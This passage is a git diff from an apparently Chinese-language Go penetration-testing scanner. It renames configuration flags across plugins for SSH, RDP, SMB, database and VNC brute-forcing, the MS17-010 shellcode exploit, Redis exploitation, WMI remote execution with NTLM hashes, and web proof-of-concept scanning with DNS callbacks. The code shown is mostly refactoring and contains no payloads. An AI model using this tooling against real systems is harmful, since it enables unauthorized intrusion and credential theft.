if Common.DisableBrute {
return nil
}
@ -200,7 +200,7 @@ func MS17010Scan(info *Common.HostInfo) error {
// 如果指定了shellcode,执行漏洞利用
defer func() {
if Common.SC != "" {
if Common.Shellcode != "" {
MS17010EXP(info)
}
}()

2
Plugins/MSSQL.go
View File

@ -11,7 +11,7 @@ import (
// MssqlScan 执行MSSQL服务扫描
func MssqlScan(info *Common.HostInfo) (tmperr error) {
if Common.IsBrute {
if Common.DisableBrute {
return
}

2
Plugins/Mongodb.go
View File

@ -9,7 +9,7 @@ import (
// MongodbScan 执行MongoDB未授权扫描
func MongodbScan(info *Common.HostInfo) error {
if Common.IsBrute {
if Common.DisableBrute {
return nil
}

2
Plugins/MySQL.go
View File

@ -11,7 +11,7 @@ import (
// MysqlScan 执行MySQL服务扫描
func MysqlScan(info *Common.HostInfo) (tmperr error) {
if Common.IsBrute {
if Common.DisableBrute {
return
}

2
Plugins/Oracle.go
View File

@ -11,7 +11,7 @@ import (
// OracleScan 执行Oracle服务扫描
func OracleScan(info *Common.HostInfo) (tmperr error) {
if Common.IsBrute {
if Common.DisableBrute {
return
}

2
Plugins/Postgres.go
View File

@ -11,7 +11,7 @@ import (
// PostgresScan 执行PostgreSQL服务扫描
func PostgresScan(info *Common.HostInfo) (tmperr error) {
if Common.IsBrute {
if Common.DisableBrute {
return
}

4
Plugins/RDP.go
View File

@ -30,7 +30,7 @@ type Brutelist struct {
// RdpScan 执行RDP服务扫描
func RdpScan(info *Common.HostInfo) (tmperr error) {
if Common.IsBrute {
if Common.DisableBrute {
return
}
@ -47,7 +47,7 @@ func RdpScan(info *Common.HostInfo) (tmperr error) {
port, _ := strconv.Atoi(info.Ports)
// 启动工作协程
for i := 0; i < Common.BruteThread; i++ {
for i := 0; i < Common.BruteThreads; i++ {
wg.Add(1)
go worker(info.Host, Common.Domain, port, &wg, brlist, &signal, &num, all, &mutex, Common.Timeout)
}

4
Plugins/Redis.go
View File

@ -27,7 +27,7 @@ func RedisScan(info *Common.HostInfo) (tmperr error) {
return err
}
if Common.IsBrute {
if Common.DisableBrute {
return
}
@ -167,7 +167,7 @@ func RedisUnauth(info *Common.HostInfo) (flag bool, err error) {
// Expoilt 尝试Redis漏洞利用
func Expoilt(realhost string, conn net.Conn) error {
// 如果配置为不进行测试则直接返回
if Common.Noredistest {
if Common.DisableRedis {
return nil
}

2
Plugins/SMB.go
View File

@ -12,7 +12,7 @@ import (
// SmbScan 执行SMB服务的认证扫描
func SmbScan(info *Common.HostInfo) (tmperr error) {
// 如果未启用暴力破解则直接返回
if Common.IsBrute {
if Common.DisableBrute {
return nil
}

14
Plugins/SMB2.go
View File

@ -15,7 +15,7 @@ import (
func SmbScan2(info *Common.HostInfo) (tmperr error) {
// 如果未启用暴力破解则直接返回
if Common.IsBrute {
if Common.DisableBrute {
return nil
}
@ -51,7 +51,7 @@ func smbHashScan(info *Common.HostInfo, hasprint bool, startTime int64) error {
return err
}
if len(Common.Hash) > 0 {
if len(Common.HashValue) > 0 {
break
}
}
@ -80,7 +80,7 @@ func smbPasswordScan(info *Common.HostInfo, hasprint bool, startTime int64) erro
return err
}
if len(Common.Hash) > 0 {
if len(Common.HashValue) > 0 {
break
}
}
@ -101,7 +101,7 @@ func logSuccessfulAuth(info *Common.HostInfo, user, pass string, hash []byte) {
}
if len(hash) > 0 {
result += fmt.Sprintf("Hash:%v", Common.Hash)
result += fmt.Sprintf("HashValue:%v", Common.HashValue)
} else {
result += fmt.Sprintf("Pass:%v", pass)
}
@ -112,8 +112,8 @@ func logSuccessfulAuth(info *Common.HostInfo, user, pass string, hash []byte) {
func logFailedAuth(info *Common.HostInfo, user, pass string, hash []byte, err error) {
var errlog string
if len(hash) > 0 {
errlog = fmt.Sprintf("[x] SMB2认证失败 %v:%v User:%v Hash:%v Err:%v",
info.Host, info.Ports, user, Common.Hash, err)
errlog = fmt.Sprintf("[x] SMB2认证失败 %v:%v User:%v HashValue:%v Err:%v",
info.Host, info.Ports, user, Common.HashValue, err)
} else {
errlog = fmt.Sprintf("[x] SMB2认证失败 %v:%v User:%v Pass:%v Err:%v",
info.Host, info.Ports, user, pass, err)
@ -213,7 +213,7 @@ func logShareInfo(info *Common.HostInfo, user string, pass string, hash []byte,
// 添加认证信息
if len(hash) > 0 {
result += fmt.Sprintf("Hash:%v ", Common.Hash)
result += fmt.Sprintf("HashValue:%v ", Common.HashValue)
} else {
result += fmt.Sprintf("Pass:%v ", pass)
}

12
Plugins/SSH.go
View File

@ -12,7 +12,7 @@ import (
)
func SshScan(info *Common.HostInfo) (tmperr error) {
if Common.IsBrute {
if Common.DisableBrute {
return
}
@ -82,7 +82,7 @@ func SshScan(info *Common.HostInfo) (tmperr error) {
}
// 如果指定了SSH密钥则不进行密码尝试
if Common.SshKey != "" {
if Common.SshKeyPath != "" {
return err
}
}
@ -94,8 +94,8 @@ func SshScan(info *Common.HostInfo) (tmperr error) {
func SshConn(ctx context.Context, info *Common.HostInfo, user string, pass string) (flag bool, err error) {
// 准备认证方法
var auth []ssh.AuthMethod
if Common.SshKey != "" {
pemBytes, err := ioutil.ReadFile(Common.SshKey)
if Common.SshKeyPath != "" {
pemBytes, err := ioutil.ReadFile(Common.SshKeyPath)
if err != nil {
return false, fmt.Errorf("[-] 读取密钥失败: %v", err)
}
@ -203,7 +203,7 @@ func SshConn(ctx context.Context, info *Common.HostInfo, user string, pass strin
if result.err != nil {
return true, result.err
}
if Common.SshKey != "" {
if Common.SshKeyPath != "" {
Common.LogSuccess(fmt.Sprintf("[+] SSH密钥认证成功 %v:%v\n命令输出:\n%v",
info.Host, info.Ports, string(result.output)))
} else {
@ -212,7 +212,7 @@ func SshConn(ctx context.Context, info *Common.HostInfo, user string, pass strin
}
}
} else {
if Common.SshKey != "" {
if Common.SshKeyPath != "" {
Common.LogSuccess(fmt.Sprintf("[+] SSH密钥认证成功 %v:%v",
info.Host, info.Ports))
} else {

2
Plugins/SmbGhost.go
View File

@ -97,7 +97,7 @@ const (
// SmbGhost 检测SMB Ghost漏洞(CVE-2020-0796)的入口函数
func SmbGhost(info *Common.HostInfo) error {
// 如果开启了暴力破解模式,跳过该检测
if Common.IsBrute {
if Common.DisableBrute {
return nil
}

2
Plugins/VNC.go
View File

@ -11,7 +11,7 @@ import (
// VncScan 执行VNC服务扫描及密码尝试
func VncScan(info *Common.HostInfo) (tmperr error) {
// 如果已开启暴力破解则直接返回
if Common.IsBrute {
if Common.DisableBrute {
return
}

12
Plugins/WMIExec.go
View File

@ -34,7 +34,7 @@ func init() {
// WmiExec 执行WMI远程命令
func WmiExec(info *Common.HostInfo) (tmperr error) {
// 如果是暴力破解模式则跳过
if Common.IsBrute {
if Common.DisableBrute {
return nil
}
@ -49,7 +49,7 @@ func WmiExec(info *Common.HostInfo) (tmperr error) {
pass = strings.Replace(pass, "{user}", user, -1)
// 尝试WMI连接
flag, err := Wmiexec(info, user, pass, Common.Hash)
flag, err := Wmiexec(info, user, pass, Common.HashValue)
// 记录错误日志
errlog := fmt.Sprintf("[-] WmiExec %v:%v %v %v %v", info.Host, 445, user, pass, err)
@ -66,8 +66,8 @@ func WmiExec(info *Common.HostInfo) (tmperr error) {
}
// 添加认证信息到结果
if Common.Hash != "" {
result += "hash: " + Common.Hash
if Common.HashValue != "" {
result += "hash: " + Common.HashValue
} else {
result += pass
}
@ -85,8 +85,8 @@ func WmiExec(info *Common.HostInfo) (tmperr error) {
}
}
// 如果使用NTLM Hash,则跳过密码循环
if len(Common.Hash) == 32 {
// 如果使用NTLM HashValue,则跳过密码循环
if len(Common.HashValue) == 32 {
break PASS
}
}

4
Plugins/WebTitle.go
View File

@ -21,7 +21,7 @@ import (
// WebTitle 获取Web标题并执行扫描
func WebTitle(info *Common.HostInfo) error {
// 如果是webpoc扫描模式直接执行WebScan
if Common.Scantype == "webpoc" {
if Common.ScanMode == "webpoc" {
WebScan.WebScan(info)
return nil
}
@ -38,7 +38,7 @@ func WebTitle(info *Common.HostInfo) error {
}
// 根据配置决定是否执行漏洞扫描
if !Common.NoPoc && err == nil {
if !Common.DisablePoc && err == nil {
WebScan.WebScan(info)
} else {
errlog := fmt.Sprintf("[-] webtitle %v %v", info.Url, err)

2
WebScan/lib/Client.go
View File

@ -37,7 +37,7 @@ func Inithttp() {
}
// 初始化HTTP客户端
err := InitHttpClient(Common.PocNum, Common.Proxy, time.Duration(Common.WebTimeout)*time.Second)
err := InitHttpClient(Common.PocNum, Common.HttpProxy, time.Duration(Common.WebTimeout)*time.Second)
if err != nil {
panic(err)
}

10
WebScan/lib/Eval.go
View File

@ -57,7 +57,7 @@ func Evaluate(env *cel.Env, expression string, params map[string]interface{}) (r
return result, nil
}
// UrlTypeToString 将 URL 结构体转换为字符串
// UrlTypeToString 将 TargetURL 结构体转换为字符串
func UrlTypeToString(u *UrlType) string {
var builder strings.Builder
@ -604,7 +604,7 @@ func reverseCheck(r *Reverse, timeout int64) bool {
// 提取子域名
sub := strings.Split(r.Domain, ".")[0]
// 构造 API 请求 URL
// 构造 API 请求 TargetURL
apiURL := fmt.Sprintf("http://api.ceye.io/v1/records?token=%s&type=dns&filter=%s",
ceyeApi, sub)
@ -700,7 +700,7 @@ func DoRequest(req *http.Request, redirect bool) (*Response, error) {
return resp, err
}
// ParseUrl 解析 URL 并转换为自定义 URL 类型
// ParseUrl 解析 TargetURL 并转换为自定义 TargetURL 类型
func ParseUrl(u *url.URL) *UrlType {
return &UrlType{
Scheme: u.Scheme,
@ -782,10 +782,10 @@ func getRespBody(oResp *http.Response) ([]byte, error) {
defer reader.Close()
decompressed, err := io.ReadAll(reader)
if err != nil && err != io.EOF && len(decompressed) == 0{
if err != nil && err != io.EOF && len(decompressed) == 0 {
return nil, err
}
if len(decompressed) == 0 && len(body) != 0{
if len(decompressed) == 0 && len(body) != 0 {
return body, nil
}
return decompressed, nil